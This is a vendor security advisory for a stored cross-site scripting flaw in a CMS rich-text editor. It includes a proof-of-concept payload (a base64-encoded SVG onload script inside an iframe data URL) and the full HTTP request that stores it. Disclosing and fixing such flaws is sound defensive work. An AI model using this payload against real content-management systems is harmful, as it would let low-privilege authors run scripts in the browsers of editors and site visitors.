The text editor contains a Stored Cross-Site Scripting vulnerability 

Issue date: 27-10-2020
Affects versions: 14.2

Security Issue ID

SECURITY-169

 

Affected Product Version(s)
14.0.0, 14.1.0, 14.2.2


Severity 

high


Description

To exploit this vulnerability a payload was crafted with a base64 encoded string containing the
following value:
<svg/onload=alert(1)>

This payload was placed inside a data URL with content-type of “text/html’. This URL was set in the
“src” attribute of an iframe element. Note the “embed” element is also vulnerable.
The request below shows the payload highlighted:

 

POST /cms/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-
tabs-panel~container-cards-3-panel-editor-extension.workflow-menu-list-1-item-
link&iframe&wicket-ajax=true&wicket-ajax-baseurl=%3F1%26amp%3Biframe HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101
Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------
326343405939007604132881994108
Content-Length: 1185
Origin: http://localhost:8080
Connection: close
Referer:
http://localhost:8080/cms/?1&iframe&path=/content/documents/developertrial/banners/
banner1
Cookie: --snip--
Upgrade-Insecure-Requests: 1
-----------------------------326343405939007604132881994108
Content-Disposition: form-data; name="id2f_hf_0"
-----------------------------326343405939007604132881994108
Content-Disposition: form-data;
name="cards:3:panel:editor:extension.editor:form:template:extension.left:view:1:ite
m:view:1:fieldContainer:item:value:widget"
Stored XSS
-----------------------------326343405939007604132881994108
Content-Disposition: form-data;
name="cards:3:panel:editor:extension.editor:form:template:extension.left:view:2:ite
m:view:2:fieldContainer:item:panel:editor"
<p><iframe src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+"></iframe></p>
--snip--

The response below shows it is accepted by the server with a 200-status code:

HTTP/1.1 200
Date: Mon, 08 Jun 2020 00:23:33 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store
Content-Type: text/xml;charset=UTF-8
Connection: close
Content-Length: 18885
--snip--

Authors are default not able to publish the pages to the site but with this payload are able to place client-side scripts to users of the CMS. Users with privileges to publish are able to place client-side scripts in the frontend which affects all visitors.

Instructions

Customers are recommended to upgrade to the latest maintenance or minor releases as indicated above. This can be done by simply incrementing the version number of the parent POM for the implementation project.

Credit for discovering this issue

Thomas van Ruitenbeek